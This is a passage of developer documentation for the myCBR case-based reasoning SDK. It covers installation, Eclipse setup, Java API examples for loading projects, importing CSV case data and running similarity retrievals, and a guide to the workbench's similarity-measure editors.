DefaultCaseBase newcasebase = project.createDefaultCB("myCaseBase");
// add a case to the case base
Instance instance = car.addInstance("car1");
instance.addAttribute(manufacturerDesc, manufacturerDesc.getAttribute("BMW"));
newcasebase.addCase(instance, "car1");
// set up query, define a query instance and do a retrieval
Retrieval results = new Retrieval(car);
Instance query = results.getQuery();
query.addAttribute(manufacturerDesc.getName(), manufacturerDesc.getAttribute("Audi"));
```
SDK for building and API for integrating CBR systems in your Application
**Modelling the domain:**
- Vocabulary (Attributes, Concepts)
- Similarity measures
- Adaptation knowledge
**Case base editing:**
- add/remove cases
- import/export data (CSV, XML)
- create, edit, optimise case base(s)
**Retrieval Engine:**
- Test the retrieval within your model
**CBREngine**
- Explanation knowledge
- Case base(s)
**Workbench**
**SDK [API]**
- load/control a project
- post query
- retrieve cases
- Load/control case bases
**Java- or Android based Application**
Info's on myCBR
## Modularization of the project
The project is well modularized, which should offer potential developers easy access to the code structure and class hierarchy of myCBR. The [java documentation](http://mycbr-project.net/doc/index.html) is available here:
<table>
<thead>
<tr>
<th>Package Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>de.dfki.mycbr.core</td>
<td>Contains all classes that represent core functionality of a CBR application such as the domain model, case bases, similarity functions and retrieval algorithms.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.action</td>
<td>Defines classes for specifying actions that operate on Observable objects.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.casebase</td>
<td>Contains classes for the basic definition of DefaultCaseBase objects.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.explanation</td>
<td>Explanations provide additional information on all myCBR concepts.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.model</td>
<td>Contains classes for the basic definition of the project's model.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.retrieval</td>
<td>All retrieval algorithms extend the abstract class RetrievalEngine and can be used within Retrieval objects to obtain the retrieval results (possibly ordered pairs of case and corresponding similarity).</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.similarity</td>
<td>Contains standard classes to maintain similarity functions for attribute descriptions (local similarity functions) and concepts (amalgamation functions).</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.similarity.config</td>
<td>Contains various enumerations specifying configurations for the corresponding similarity function.</td>
</tr>
<tr>
<td>de.dfki.mycbr.io</td>
<td>Contains classes that handle import and export of relevant CBR application data.</td>
</tr>
<tr>
<td>de.dfki.mycbr.util</td>
<td>Contains utility classes that are useful but do not have a special meaning for case-based reasoning applications.</td>
</tr>
</tbody>
</table>
Web Sources for myCBR
Your **web source** for myCBR:
https://git.opendfki.de/public
System Requirements
The **minimum system requirements** to run myCBR are:
- Essentially any PC that can run a Java Runtime Environment with reasonable performance is sufficient to use myCBR.
- CBR engines developed with myCBR are slim/efficient enough to be run on recent smartphones without limitations.
**Software requirements** to run the myCBR SDK standalone:
- Java Runtime Environment (JRE), preferably in its latest version; the minimum version required is 1.6
Prerequisites for development
If you plan to **develop the myCBR SDK** further you need these additional prerequisites to be able to do so:
The **Java Development Kit (JDK)** with minimum version 1.6; however, the most recent version is recommended. You can find the JDK here:
A **Java-Development Environment (JDE)**, we recommend Eclipse, which you can find here:
http://www.eclipse.org/downloads/
If you want to integrate **repository access** to the **mycbr.opendfki.de project** into your development environment, we recommend using a plugin to do so. For example, to integrate the subversion repository into the Eclipse JDE we recommend the **Subclipse Plug-In**, which you can find here: http://subclipse.tigris.org/
To sign up for the open source development community of myCBR, get an opendfki account here:
http://www.opendfki.de/
Repository access to the project (opendfki account required):
https://mycbr.opendfki.de/repos/mycbr-gui
During your account registration you can choose which project you would like to contribute to. To contribute, choose myCBR.
There is currently only the java doc available as a basis for reading into the project’s source. This will shortly be amended with additional material for developers.
While you are invited to add to, refactor and optimise the myCBR SDK, we still follow a strict policy for the acceptance of new versions of the SDK. This policy requires passing a series of JUnit tests that are also available with the source of the SDK. The final decision on new versions/features of the SDK lies with the two centres currently leading its development at the DFKI and the UWL.
Information for developers
The DFKI and UWL maintain a **Wiki for all information about the current development** of the myCBR SDK. However, access to this Wiki requires a user account, for which you can contact christian.sauer@uwl.ac.uk.
You can find the Wiki here: [http://mycbr.opendfki.de/](http://mycbr.opendfki.de/)
To get signed up to the **mailing list of myCBR developers** and get updates about the latest developments you can contact: [cbr@dfki.uni-kl.de](mailto:cbr@dfki.uni-kl.de).
If you want to get a **broader view and the latest developments in CBR** you may also consider signing up for the CBR Wiki, to be found here: [http://cbrwiki.fdi.ucm.es/mediawiki/index.php/Main_Page](http://cbrwiki.fdi.ucm.es/mediawiki/index.php/Main_Page)
myCBR Installation
How to install the myCBR SDK on a Windows 7 PC
1. Download the zip archive (binaries) from the myCBR download website:
http://mycbr-project.net/download.html
This archive contains all files for the ‘product’ version of the myCBR SDK
2. Unzip the contents of the mycbr.zip into a single folder.
The contents of your new myCBR folder should look like pictured here.
3. To Start myCBR simply run (double-click) the myCBR.exe file
The start-up may take a while...
SDK for building and integrating CBR systems
If everything went correctly (be patient: as myCBR is a Java application, its start might take up to 30 seconds), your first impression of myCBR should look like this:
myCBR installation for developers
Prerequisite 1: Subversion integrated into Eclipse: Subclipse
Installation: In Eclipse open the Help menu → Install new software → Enter the path at “Work with:” http://subclipse.tigris.org/update 1.4.x → Choose Subclipse and all of its components.
Installation of the Development Environment
For older versions of the JDE (Eclipse), or if you want to work with versions of myCBR older than 3.0, you might need the Eclipse **Standard Widget Toolkit (SWT)**.
This shouldn’t be necessary with most recent Eclipse/myCBR versions but if you have to include SWT into your Eclipse JDE make sure you do so before you move on to configure your myCBR project.
You can download the SWT here: [http://www.eclipse.org/swt/](http://www.eclipse.org/swt/)
Installation: Include SWT as a project (might be needed on older versions of Eclipse)
Import → Existing Projects into Workspace
Installation of the Development Environment
Eclipse: Standard Widget Toolkit installation (continued)
Choose the path to your downloaded SWT zip archive → Select the project (org.eclipse.swt) → Finish
Installation of the Development Environment
Eclipse: Standard Widget Toolkit installation (continued)
If your SWT installation was successful, you should have a project like this:
**Prerequisite 2: Import the myCBR project** from the repository at the DFKI
File → Import → SVN → Checkout Projects from SVN → Next →
Create a new repository location: URL: [https://mycbr.opendfki.de/repos/mycbr/gui/trunk](https://mycbr.opendfki.de/repos/mycbr/gui/trunk) → Next
Installation of the Development Environment
Prerequisite 2: **Import the myCBR project** from the repository at the DFKI (continued)
Select the project as shown below, make sure to tick the checkbox ‘Check out as a project in the workspace’. **Check out the HEAD revision** and select **fully recursive** and **allow for unversioned obstructions** → Finish
Prerequisite 2: **Import the myCBR project** from the repository at the DFKI (continued)
If all went okay you should have a project like this in your Eclipse JDE:
Have a look at `mycbr.product`; this is what you need to configure to launch myCBR from your JDE.
Launching myCBR from the JDE
Double-click ‘mycbr.product’ in your project tree: Select the Dependencies Tab → Remove All
Launching myCBR from the JDE
Click on ‘Add…’ → (and then select) `de.dfki.mycbr.gui` → OK
Launching myCBR from the JDE
Click on ‘Add required Plug-Ins’ to let Eclipse integrate all necessary Plug-Ins for myCBR to run.
Launching myCBR from the JDE
Back in the ‘Overview’ Tab make sure that the checkbox ‘The product includes native launcher artifacts’ is ticked.
You can now select ‘Launch an Eclipse application’ to start the myCBR SDK.
myCBR Application design and API use
myCBR Application design
Integrating a myCBR engine in your project can be achieved in different ways:
Direct myCBR integration into an application:
You can integrate the myCBR library directly into your java program and load myCBR engines and case-bases into your program to execute queries on them.
Central myCBR engine server and several clients: (alpha-stage development)
You can run a central server which integrates the myCBR library into a server-based java program and then process queries, deliver query-results to thin clients.
Additionally: mobile application (alpha-stage development)
There is currently a mobile-centered version of myCBR under development, which particularly targets the needs of Android-based development. This version of myCBR is not yet available to developers.
All designs: Create an **Instance of CBREngine** and use this to load your model data and case base. After finishing loading all data into your Instance of CBREngine you do retrievals from this CBREngine by posting query instances to it and retrieving result sets, containing lists of best matching cases (Instances).
myCBR Application design: Thin Client
API use for building and integrating your CBR Engine
Thin Client Diagram: Web frontend, Server (myCBR), Query-Retrieval (for example using JSP)
myCBR Application design: Thin Client
API use for building and integrating your CBR Engine: Using the API
Fat Client Diagram: Application also hosts the CBR Engine
myCBR SDK integration
Loading an engine/myCBR project
Don’t forget to import the necessary libraries (depending on what you plan to do with your CBR engine).
Several ways to do things with the myCBR API
We chose a very simple one, which might not be the most flexible or efficient but is easy to follow as a start for developers new to myCBR. Feel free to use it however you like.
Our basic approach:
In your Application class: Create an instance of CBREngine
Load model and data (case base) into this engine
Construct your Query instance using the engine
Query the engine with the query instance
Use the result (sets) returned by the engine
The following is a walkthrough of the example given at the end of this chapter.
Overview: CBREngine
Don’t forget to define your (myCBR)-project variables in your **copy** (**sourcecode**) of the Class “CBREngine”
## Constructor and Description
<table>
<thead>
<tr>
<th>Method</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>CBREngine()</strong></td>
<td></td>
</tr>
</tbody>
</table>
## Methods
<table>
<thead>
<tr>
<th>Modifier and Type</th>
<th>Method and Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>de.dfki.mycbr.core.Project</td>
<td>createCBRProject() This method creates a myCBR project and loads the cases in this project.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.Project</td>
<td>createemptyCBRProject() This method creates an EMPTY myCBR project.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.Project</td>
<td>createProjectFromPRJ() This method creates a myCBR project and loads the project from a .prj file.</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getCaseBase()</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getConceptName()</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getCsv()</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getProjectName()</td>
</tr>
<tr>
<td>static void</td>
<td>setCasebase(java.lang.String casebase)</td>
</tr>
<tr>
<td>static void</td>
<td>setConceptName(java.lang.String conceptName)</td>
</tr>
<tr>
<td>static void</td>
<td>setCsv(java.lang.String csv)</td>
</tr>
<tr>
<td>static void</td>
<td>setProjectName(java.lang.String projectName)</td>
</tr>
</tbody>
</table>
Define your project in the CBREngine java
Define your (myCBR)-project variables in your copy of the Class “CBREngine”
Set path to myCBR projects (note that backslashes must be escaped in Java string literals):
```java
// for example: private static String data_path = "C:\\myCBRprojects\\project\\";
private static String data_path = "K:\\Example_Projects\\examples\\";
```
Project-specific variables:
```java
// name of the project file
private static String projectName = "NewExampleProject.prj";
// name of the central concept
private static String conceptName = "Car";
// name of the csv containing the instances
private static String csv = "cars_casebase.csv";
// set the separators that are used in the csv file
private static String columnseparator = ";";
private static String multiplevalueseparator = ",";
// name of the case base that should be used; the default name in myCBR is CB_csvImport
private static String casebase = "CarsCB";
```
Don’t forget to import the necessary libraries (check with Ctrl+Shift+O in Eclipse)
Usually these libraries are:
```java
import java.text.ParseException;
import java.util.List;
import de.dfki.mycbr.core.Project;
import de.dfki.mycbr.core.casebase.Instance;
import de.dfki.mycbr.core.model.Concept;
import de.dfki.mycbr.core.model.FloatDesc;
import de.dfki.mycbr.core.model.IntegerDesc;
import de.dfki.mycbr.core.model.SymbolDesc;
import de.dfki.mycbr.core.retrieval.Retrieval;
import de.dfki.mycbr.core.retrieval.Retrieval.RetrievalMethod;
import de.dfki.mycbr.core.similarity.Similarity;
import de.dfki.mycbr.io.CSVImporter;
import de.dfki.mycbr.core.*;
import de.dfki.mycbr.core.model.*;
import de.dfki.mycbr.util.Pair;
```
Loading a project into the Engine and preparing the data
```java
// Within your Application class: Create your instance of the CBREngine (named "engine" here)
CBREngine engine = new CBREngine();
// Create a Project (named "rec" here) and load all necessary data into it
Project rec = engine.createProjectFromPRJ();
// create a case base (named "cb" here)
// and assign the case base to be used for submitting a query
DefaultCaseBase cb = (DefaultCaseBase) rec.getCaseBases().get(engine.getCaseBase());
// create a Concept (named "myConcept" here) of the main Concept (type) of the Project
Concept myConcept = rec.getConceptByID(engine.getConceptName());
```
Prepare a query I: Retrieval and query instance
```java
// create a new retrieval (called "ret" here)
Retrieval ret = new Retrieval(myConcept, cb);
// specify the retrieval method
ret.setRetrievalMethod(RetrievalMethod.RETRIEVE_SORTED);
// available retrieval methods are: RETRIEVE, RETRIEVE_SORTED, RETRIEVE_K, RETRIEVE_K_SORTED
// create a query instance (named "query" here) / A query instance essentially is a case that
// will have assigned the values to its attributes that specify the query
Instance query = ret.getQueryInstance();
```
Prepare a query II: Insert values
```java
// Insert values into the query: Symbolic Description
SymbolDesc colorDesc = (SymbolDesc) myConcept.getAllAttributeDescs().get("Color");
query.addAttribute(colorDesc, colorDesc.getAttribute("Green"));
// Insert values into the query: Float Description
FloatDesc priceDesc = (FloatDesc) myConcept.getAllAttributeDescs().get("Price");
try {
    query.addAttribute(priceDesc, priceDesc.getAttribute("4799.0"));
} catch (ParseException e) {
    e.printStackTrace();
}
FloatDesc mileageDesc = (FloatDesc) myConcept.getAllAttributeDescs().get("Mileage");
try {
    query.addAttribute(mileageDesc, mileageDesc.getAttribute("10000"));
} catch (ParseException e) {
    e.printStackTrace();
}
```
Perform retrieval and use result
See the example JSP project for a more complex use and display of the retrieval result.
```java
// perform retrieval
ret.start();
// get the retrieval result as a List (named “result” here)
List <Pair<Instance, Similarity>> result = ret.getResult();
if( result.size() > 0 ){
String casename = result.get(0).getFirst().getName(); // get the case name
Double sim = result.get(0).getSecond().getValue(); // get the similarity value
answer = "I found "+casename+" with a similarity of "+sim+" as the best match.";
}
else{ System.out.println("Retrieval result is empty"); }
```
Selection and use of Amalgamation functions
Remember: An amalgamation function is a weighted sum of all local similarities (attribute similarities) of a concept that constitutes the overall global similarity measure of the concept.
Sometimes it can be useful to be able to switch between different amalgamation functions, for example to comply with different user preferences within different user groups. The myCBR API allows you to access and use different amalgamation functions, which you have modelled before using the workbench.
```java
// List all available amalgamation functions for a concept
List<AmalgamationFct> liste = myConcept.getActiveAmalgamFcts();
// Set an amalgamation function to be used for the similarity computation
// of a concept, e.g. the first one from the list above
myConcept.setActiveAmalgamFct(liste.get(0));
```
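As a plain-Java illustration of the idea (not the myCBR API), switching between amalgamation functions amounts to selecting a different named weight set over the same local similarities; the group names and weights here are invented:

```java
import java.util.Map;

// Sketch: two named "amalgamation functions" as weight sets over the
// local similarities of two attributes (price, mileage).
public class AmalgamationSwitch {

    static final Map<String, double[]> amalgamations = Map.of(
            "budgetBuyer", new double[] { 0.8, 0.2 },
            "heavyDriver", new double[] { 0.2, 0.8 });

    // Global similarity under the selected amalgamation function.
    public static double globalSim(String fctName, double priceSim, double mileageSim) {
        double[] w = amalgamations.get(fctName);
        return w[0] * priceSim + w[1] * mileageSim;
    }
}
```

The same pair of local similarities then yields a different global similarity per user group.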
API in general: loading a myCBR project
If you don’t want to use the CBREngine class, you find the general API commands to handle projects etc. in the following slides:
```java
// To load a new project use:
// data_path thereby pointing to the path where the project is stored + the project's name
Project myproject = new Project(data_path + projectName);
// To create a concept and get the main concept of the project.
// The name (conceptName) has to be specified at the beginning of your class-code
Concept myconcept = myproject.getConceptByID(conceptName);
// Initialize CSV import with this code: (data_path: path to your csv folder + the csv-file itself)
CSVImporter csvImporter = new CSVImporter(data_path + csv, myconcept);
// To set the separators that are used in the csv file use these calls:
csvImporter.setSeparator(columnseparator); // column separator
csvImporter.setSeparatorMultiple(multiplevalueseparator); // multiple value separator
```
API in general: importing project data
```java
// To prepare the data for the import of the project data in csv-format you can use these methods:
csvImporter.readData();               // read csv data
csvImporter.checkData();              // check formal validity of the data
csvImporter.addMissingValues();       // add missing values with default values
csvImporter.addMissingDescriptions(); // add default descriptions
// Finally, to import the instances of the Concept defined, use:
csvImporter.doImport();               // Import the data into the project
```
API in general: querying your project
Initiate a query:
```java
// create a new retrieval
Retrieval ret = new Retrieval(myConcept, cb);
// specify the retrieval method
ret.setRetrievalMethod(RetrievalMethod.RETRIEVE_SORTED);
// available retrieval methods are: RETRIEVE, RETRIEVE_SORTED, RETRIEVE_K, RETRIEVE_K_SORTED
// create a query instance
Instance query = ret.getQueryInstance();
```
API in general: querying your project
Insert values into the query:
```java
// Symbolic Description
SymbolDesc manufacturerDesc = (SymbolDesc) myConcept.getAllAttributeDescs().get("Manufacturer");
query.addAttribute(manufacturerDesc, manufacturerDesc.getAttribute("bmw"));
// Float Description
FloatDesc priceDesc = (FloatDesc) myConcept.getAllAttributeDescs().get("Price");
query.addAttribute(priceDesc, priceDesc.getAttribute("47699.0"));
// Int Description
IntegerDesc yearDesc = (IntegerDesc) myConcept.getAllAttributeDescs().get("Year");
query.addAttribute(yearDesc, yearDesc.getAttribute("1996"));
```
API in general: querying your project
Insert values into the query (continued):
```java
// String Description
StringDesc titleDesc = (StringDesc) myConcept.getAllAttributeDescs().get("Title");
query.addAttribute(titleDesc, titleDesc.getAttribute("Cheese-Crusted Chicken with Cream"));
// Symbolic Description and multiple Values
SymbolDesc methodDesc = (SymbolDesc) myConcept.getAllAttributeDescs().get("Method");
// define a list that will be used to store the values
LinkedList<Attribute> list = new LinkedList<Attribute>();
// add query values to the list
list.add(methodDesc.getAttribute("roast"));
list.add(methodDesc.getAttribute("arrange"));
list.add(methodDesc.getAttribute("warm up"));
list.add(methodDesc.getAttribute("stir"));
list.add(methodDesc.getAttribute("cook"));
list.add(methodDesc.getAttribute("melt"));
// create a multiple attribute and add the attribute's description and the specified list
MultipleAttribute<SymbolDesc> mult = new MultipleAttribute<SymbolDesc>(methodDesc, list);
// add the query attribute to the list
query.addAttribute(methodDesc.getName(), mult);
```
API in general: execute a query / use result
Execute the query (do the retrieval):
```java
// perform retrieval
ret.start();
// get the retrieval result
List<Pair<Instance, Similarity>> result = ret.getResult();
// get the case name
result.get(0).getFirst().getName();
// get the similarity value
result.get(0).getSecond().getValue();
```
API in general: accessing the model
```java
// get all attributes of the CBR case model
HashMap<String, AttributeDesc> valueMap = myConcept.getAllAttributeDescs();
// get the allowed values for each Attribute
for (Map.Entry<String, AttributeDesc> entry : valueMap.entrySet()) {
    System.out.println(entry.getValue());
    AttributeDesc attdesc = entry.getValue();
    String attClass = attdesc.getClass().toString();
    if (attClass.compareTo("class de.dfki.mycbr.core.model.SymbolDesc") == 0) {
        SymbolDesc symbolDesc = (SymbolDesc) entry.getValue();
        Set<String> elements = symbolDesc.getAllowedValues();
        for (String allowedValue : elements) {
            System.out.println("\t\t" + allowedValue);
        }
    }
}
```
myCBR SDK integration
Directly create a project and enter data into it, create a query and run the retrieval in its most compact form:
```java
// requires myCBR 3.1
Project p = new Project();
// Create Concept Car
Concept car = p.createTopConcept("Car");
// add symbol attribute
HashSet<String> manufacturers = new HashSet<String>();
String[] manufacturersArray = { "BMW", "Audi", "VW", "Ford", "Mercedes", "SEAT", "FIAT" };
manufacturers.addAll(Arrays.asList(manufacturersArray));
SymbolDesc manufacturerDesc = new SymbolDesc(car, "manufacturer", manufacturers);
// add table (similarity) function
SymbolFct manuFct = manufacturerDesc.addSymbolFct("manuFct", true);
manuFct.setSimilarity("BMW", "Audi", 0.60d);
manuFct.setSimilarity("Audi", "VW", 0.20d);
manuFct.setSimilarity("VW", "Ford", 0.40d);
// add case base
DefaultCaseBase cb = p.createDefaultCB("myCaseBase");
// add case
Instance i = car.addInstance("car1");
i.addAttribute(manufacturerDesc, manufacturerDesc.getAttribute("BMW"));
cb.addCase(i, "car1");
// set up query and retrieval
Retrieval r = new Retrieval(car);
Instance q = r.getQuery();
q.addAttribute(manufacturerDesc.getName(), manufacturerDesc.getAttribute("Audi"));
r.start();
// r now contains the retrieved best case(s)
```
myCBR workbench: GUI elements
Main View Elements
File Menu:
- Open/Save Projects
- Model: Actions available for Models, Concepts, Attributes
Shortcuts for:
- Create, Open and Open recent projects
The Projects View:
- This view provides an overview of your currently opened projects in a tree structure. It further provides all necessary actions to add/remove elements to/from your model.
The Similarity Measure view:
- This view shows you the assigned Similarity Measures for a selected Project, Concept or Attribute. It further provides the actions to add or remove Similarity Measures to the selected Project, Concept or Attribute.
Main View:
- This is where you get detailed information and ways for interactions with your model for a selected component of your model.
Perspective Tabs:
- Selecting the Tabs switches between the different available Perspectives in myCBR. The two main perspectives now are: Modelling, where you design your model and Case Bases where you create and optimise your Cases and Case bases.
Projects View Elements
Start a retrieval: Starts the retrieval task for the selected project
Add Concept: Add a new concept (thing) to the selected project
Add a Concept as Attribute: Add a Concept as an Attribute to the selected Concept: think of Part-of relations
Add an Attribute: Add an Attribute to a selected Concept
Delete: Delete the selected Component (Either Concept or Attribute) Every dependent Component will be deleted as well
The Project Tree:
This Tree lists every Concept within the project; a double-click shows detailed information about the project
The Concept Tree:
This Tree lists all Attributes of the selected Concept; a double-click shows detailed information about the concept
An Attribute:
A double-click shows detailed information about the Attribute.
Symbol Attribute Icon
Integer Attribute Icon
Float Attribute Icon
Similarity Measures View
Example of an added alternative Similarity Measure
The generated default Similarity Measure (In this Example for the Attribute ‘Body’ of the Car Concept)
Delete a selected Similarity Measure
Add a Similarity Measure for the selected component. To be able to add a Measure the default generated Measure must be selected.
Main View: Used cars example
- The selected component in the project tree is highlighted.
- The list of defined Similarity Measures for the selected component.
- The Tab label of the selected component.
- Main information display for the selected component.
- Tabs for the quick navigation to the different views/editors of a selected component.
The table editor is used to describe the similarity mode table. This similarity mode can be chosen for the slot type symbol.
If there are only a few values for your slot which can’t be ordered absolutely or hierarchically, you should use the table editor.
The Attribute ‘Body’ of the Concept ‘Car’ is selected.
The default (auto generated) similarity measure for the attribute ‘body’ is selected.
Symmetry: Choosing symmetric makes the similarity matrix symmetric.
Symmetry: Choosing asymmetric makes the similarity matrix asymmetric.
The diagonal which splits the either symmetric or asymmetric halves of the similarity matrix.
The colours of the fields are an optical aid to visualise the values.
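In essence, a table similarity measure is just a matrix lookup: sim(query value, case value) is read directly from the corresponding cell, with 1.0 on the diagonal. A minimal sketch in Java — class name and values are illustrative, this is not the myCBR API:

```java
import java.util.HashMap;
import java.util.Map;

// Sketch of a table-based symbol similarity measure:
// sim(query, case) is read directly from a matrix of values in [0.0, 1.0].
public class SymbolTableSim {
    private final Map<String, Double> table = new HashMap<>();
    private final boolean symmetric;

    public SymbolTableSim(boolean symmetric) { this.symmetric = symmetric; }

    public void set(String q, String c, double sim) {
        table.put(q + "|" + c, sim);
        if (symmetric) table.put(c + "|" + q, sim); // mirror across the diagonal
    }

    public double similarity(String q, String c) {
        if (q.equals(c)) return 1.0;               // the diagonal is always 1.0
        return table.getOrDefault(q + "|" + c, 0.0);
    }

    public static void main(String[] args) {
        SymbolTableSim body = new SymbolTableSim(true);
        body.set("sedan", "combi", 0.6);           // illustrative similarity values
        body.set("sedan", "convertible", 0.2);
        System.out.println(body.similarity("combi", "sedan"));  // 0.6 (symmetric)
        System.out.println(body.similarity("sedan", "sedan"));  // 1.0
    }
}
```

With an asymmetric matrix, only the explicitly set direction is filled in, which is exactly what the two halves around the diagonal in the editor represent.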
Edit similarity measures: Symbol, Taxonomy
Symmetry: Selects whether the similarity is symmetric (a single function f(q,c)) or asymmetric (two functions, f(q,c) and g(q,c)).
Include the values of inner (abstract) nodes in the similarity calculation. An inner node is, for example, blue, as an abstraction (class) of light_blue and dark_blue.
Select how to handle values for inner (abstract) nodes. Any Value: Any node below this node is to be considered. “I search for a blue car (but don’t mind if it is light or dark blue).”
Uncertain: Opens up access to the “Semantics of uncertain” values below to choose one semantic (See next slide).
The taxonomy editor is used to describe the similarity mode taxonomy. This similarity mode can be chosen for the slot type symbol.
You could use taxonomy as a similarity mode in case the slot’s values can be arranged in a hierarchical structure, such that:
- nodes on the same level are disjoint sets
- nodes on the last level are real-world objects
- inner nodes consist of the real-world objects that follow them in the hierarchical order
The Taxonomy editor, which allows you to drag & drop nodes in the taxonomy and to enter similarity values manually by double-clicking a node.
Edit similarity measures: Symbol, Taxonomy
The taxonomy is to be used in an asymmetric way. This means that the taxonomy is used in two different ways, depending on whether the query value is greater than the value in the case or vice versa. Therefore the GUI provides you with the option to specify different uses of the taxonomy for the Query (Q) as well as the Case (C).
You can specify distinct ways to describe (calculate) the similarity for the query and for the case comparison.
The taxonomy editor automatically creates the table used for the table editor. So you can use the taxonomy editor to initially fill the table and then switch the similarity mode to table to edit the table manually. This is very useful in case you want to use the table editor but your project structure is very complex.
If you opt for handling values of inner nodes with uncertainty you have to specify the semantic you want to use to handle the uncertainty:
Pessimistic: Use the lower bound of the similarity (Q,C)
Optimistic: Use the upper bound of the similarity (Q,C)
Average: Use the average between the lower and upper bound
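Conceptually, a taxonomy measure derives sim(Q, C) from the deepest common ancestor of the two values; the pessimistic/optimistic/average semantics then take the lower bound, upper bound, or mean over the leaf similarities possible under an uncertain inner node. A minimal sketch of the common-ancestor lookup — node names and values are illustrative, this is not the myCBR API:

```java
import java.util.*;

// Sketch of a taxonomy similarity: each node carries a similarity value,
// and sim(q, c) is the value of the deepest common ancestor of q and c.
public class TaxonomySim {
    private final Map<String, String> parent = new HashMap<>();
    private final Map<String, Double> nodeSim = new HashMap<>();

    public void addNode(String name, String par, double sim) {
        parent.put(name, par);
        nodeSim.put(name, sim);
    }

    private List<String> pathToRoot(String n) {
        List<String> p = new ArrayList<>();
        for (String cur = n; cur != null; cur = parent.get(cur)) p.add(cur);
        return p;
    }

    public double similarity(String q, String c) {
        if (q.equals(c)) return 1.0;
        Set<String> qAncestors = new HashSet<>(pathToRoot(q));
        for (String a : pathToRoot(c))      // walk up from the case value...
            if (qAncestors.contains(a))     // ...until we hit a shared ancestor
                return nodeSim.get(a);
        return 0.0;
    }

    public static void main(String[] args) {
        TaxonomySim t = new TaxonomySim();
        t.addNode("color", null, 0.0);
        t.addNode("blue", "color", 0.7);    // inner node: any two blues are 0.7 similar
        t.addNode("light_blue", "blue", 1.0);
        t.addNode("dark_blue", "blue", 1.0);
        t.addNode("red", "color", 1.0);
        System.out.println(t.similarity("light_blue", "dark_blue")); // 0.7
        System.out.println(t.similarity("light_blue", "red"));       // 0.0
    }
}
```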
**Edit similarity measures: Integer, Simple function**
- **Symmetry**: Allows you to choose to specify a symmetric or asymmetric function, choosing asymmetric activates the input for both sides of the function (C<Q and C>Q).
- **Difference**: Calculates a numerical value for the difference between Query and Case values.
- **Quotient**: Calculates a quotient out of the Query and Case values.
- **Left side**: The function specifies the similarity for Case values lower than the Query value.
- **Right side**: The function specifies the similarity for Case values higher than the Query value.
**Constants**:
- **Constant**: Enter a value that the function will return as a constant.
- **Modelling**:
- A step in the function and the value at which it should occur.
- The polynomial change of similarity with a basic value.
- A smooth step in the function at a given value.
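The simple-function modes above can be sketched as a distance-based function: normalise the difference between query and case by the attribute range, then shape each side of the function independently. An illustrative Java sketch — the linear and polynomial shapes below are assumptions, not the exact editor output:

```java
// Sketch of an asymmetric, difference-based similarity function for integers.
// Left side (case < query) and right side (case > query) are shaped
// independently, as in the simple-function editor.
public class IntegerSim {
    private final double range;   // attribute range, used to normalise the difference

    public IntegerSim(int min, int max) { this.range = max - min; }

    public double similarity(int query, int caseValue) {
        double d = Math.abs(query - caseValue) / range;  // normalised difference in [0,1]
        if (caseValue <= query)
            return 1.0 - d;                  // left side: linear decline
        return Math.pow(1.0 - d, 3);         // right side: faster (polynomial) decline
    }

    public static void main(String[] args) {
        IntegerSim price = new IntegerSim(0, 50000);
        // A cheaper case is penalised less than a more expensive one:
        System.out.println(price.similarity(10000, 5000));   // left side: 0.9
        System.out.println(price.similarity(10000, 15000));  // right side declines faster
    }
}
```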
Edit similarity measures: Integer, Advanced function
The advanced similarity mode can be chosen for the attribute types integer and float.
You should use advanced similarity mode in case your similarity measure function cannot be represented by the standard similarity mode.
As you are modelling the function freely you should always select asymmetric for advanced integer and float functions.
Add a new similarity point to the function. To add it click the button and then enter the function value (Distance) and the desired similarity for this value.
You can add similarity points and the result will be an interpolated function for your similarity measure.
This is the List of your added similarity points to the function. You can remove points by selecting the entry in the table and then click 'Remove'.
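Interpolating between the added similarity points can be sketched as follows — an illustrative linear interpolation, not the myCBR implementation:

```java
import java.util.Map;
import java.util.TreeMap;

// Sketch of the "advanced" mode: similarity points (distance -> similarity)
// are linearly interpolated to form the similarity function.
public class AdvancedSim {
    private final TreeMap<Double, Double> points = new TreeMap<>();

    public void addPoint(double distance, double sim) { points.put(distance, sim); }

    public double similarity(double distance) {
        Map.Entry<Double, Double> lo = points.floorEntry(distance);
        Map.Entry<Double, Double> hi = points.ceilingEntry(distance);
        if (lo == null) return hi.getValue();        // before the first point
        if (hi == null) return lo.getValue();        // after the last point
        if (lo.getKey().equals(hi.getKey())) return lo.getValue(); // exact hit
        double t = (distance - lo.getKey()) / (hi.getKey() - lo.getKey());
        return lo.getValue() + t * (hi.getValue() - lo.getValue());
    }

    public static void main(String[] args) {
        AdvancedSim f = new AdvancedSim();
        f.addPoint(0.0, 1.0);
        f.addPoint(1000.0, 0.5);
        f.addPoint(5000.0, 0.0);
        System.out.println(f.similarity(500.0));   // interpolated: 0.75
    }
}
```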
Options for the Global similarity measure are:
- Weighted sum: use weights on the attributes
- Euclidean
- Maximum: of the local similarities (max(weight*local_sim))
- Minimum: of the local similarities (min(weight*local_sim))
Select the concept to model the global similarity measure for. In this example the global similarity of the concept ‘Car’ is modelled.
The global similarity function (Amalgamation function) selected for this concept. You can add alternative global similarity functions, analogously to the definition of alternative SMFs for Attributes.
The SMF (Similarity Function) in use for this attribute. Click the field to select an SMF from the available SMFs for the Attribute.
Set the Attribute as to be included in the global similarity calculation or not.
Set the weight of the attribute (It’s a good idea to use 100 as an overall value for the case and distribute it as weights onto the attributes).
Edit similarity measures: Global Similarity Measure
The global similarity function to use is selected by right-clicking the desired function and then setting it as the active amalgamation function.
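The weighted sum simply normalises the weighted local similarities: global = Σ(weight_i · local_i) / Σ(weight_i). A minimal sketch — the attribute weights are illustrative, matching the tip of distributing 100 across the attributes:

```java
// Sketch of a weighted-sum amalgamation (global similarity) function.
public class WeightedSum {
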